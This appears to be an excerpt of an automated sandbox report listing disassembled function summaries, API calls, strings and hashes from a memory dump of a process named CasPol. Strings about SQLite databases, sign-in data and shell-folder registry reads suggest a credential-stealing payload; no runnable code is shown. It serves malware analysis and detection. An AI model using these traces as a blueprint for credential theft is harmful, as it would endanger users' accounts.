                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                                                    • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                                                    • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                                                    • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2047574939-0
                                                                                                                                                                                    • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
• wcslen.MSVCRT ref: 0040BE06
• wcsncmp.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$FreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID:
• API String ID: 161710377-0
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• API String ID: 3510742995-2446657581
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A25
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
• memset.MSVCRT ref: 00405ABB
• SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
• SetFocus.USER32(?), ref: 00405B76
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
Strings
• <%s>, xrefs: 004100A6
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061

APIs
• strlen.MSVCRT ref: 00408DFA
  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
• memset.MSVCRT ref: 00408E46
• memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
• memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
• memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
• memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memsetstrlen
• String ID:
• API String ID: 2350177629-0

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402

APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0

APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 4131475296-0

APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568

APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
APIs
• GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 0040FE1F
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 1775345501-2769808009
APIs
• wcscpy.MSVCRT ref: 0041477F
• wcscpy.MSVCRT ref: 0041479A
• CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
• CloseHandle.KERNEL32(00000000), ref: 004147C8
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
